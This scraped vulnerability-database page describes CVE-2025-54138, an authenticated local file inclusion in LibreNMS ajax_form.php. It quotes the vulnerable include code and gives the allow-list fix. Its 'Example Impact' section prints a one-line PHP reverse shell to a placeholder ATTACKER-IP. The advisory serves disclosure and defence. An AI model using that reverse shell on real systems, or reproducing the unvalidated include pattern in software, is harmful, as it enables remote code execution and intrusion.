7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2025-54138

GHSA ID

GHSA-gq96-8w38-hhj2

EPSS Score

CWE

CWE-98

Published

7/21/2025

Updated

7/21/2025

KEV Status

Technology

PHP

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-54138

CVE-2025-54138: LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE

LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php endpoint that permits Local File Inclusion (LFI) based on user-controlled POST input.

The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:

if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {
    include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';
}

This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.

This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.

Conditions for Exploitation

Attacker must be authenticated
Attacker must control a file at includes/html/forms/{type}.inc.php (or symlink)

Example Impact (RCE)

If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:

<?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>

https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812

Recommended Fix

Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames.
Avoid passing raw POST input into include_once.
Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-54138

CVE-2025-54138:

7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2025-54138

GHSA ID

GHSA-gq96-8w38-hhj2

EPSS Score

CWE

CWE-98

Published

7/21/2025

Updated

7/21/2025

KEV Status

Technology

PHP

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
librenms/librenms	composer	< 25.7.0	25.7.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability exists in the html/ajax_form.php script. The analysis of the provided patch ec89714d929ef0cf2321957ed9198b0f18396c81 clearly shows the remediation of a Local File Inclusion (LFI) vulnerability. The original code dynamically included a file based on the $_POST['type'] parameter without proper validation, using include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';. This is a classic LFI pattern. The fix replaces this dynamic inclusion with a match statement that acts as a strict allow-list, ensuring only expected files can be included. Since the vulnerable code is in the main execution body of ajax_form.php and not within a defined function, the script itself is the vulnerable component. A runtime profiler would show execution within ajax_form.php when the vulnerability is triggered.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-54138: LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE

Conditions for Exploitation

Example Impact (RCE)

Recommended Fix

CVE-2025-54138:

7.5

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Basic Information

Basic Information

Technical Details

7.5

7.5

CVE-2025-54138: LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE

Conditions for Exploitation

Example Impact (RCE)

Recommended Fix

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI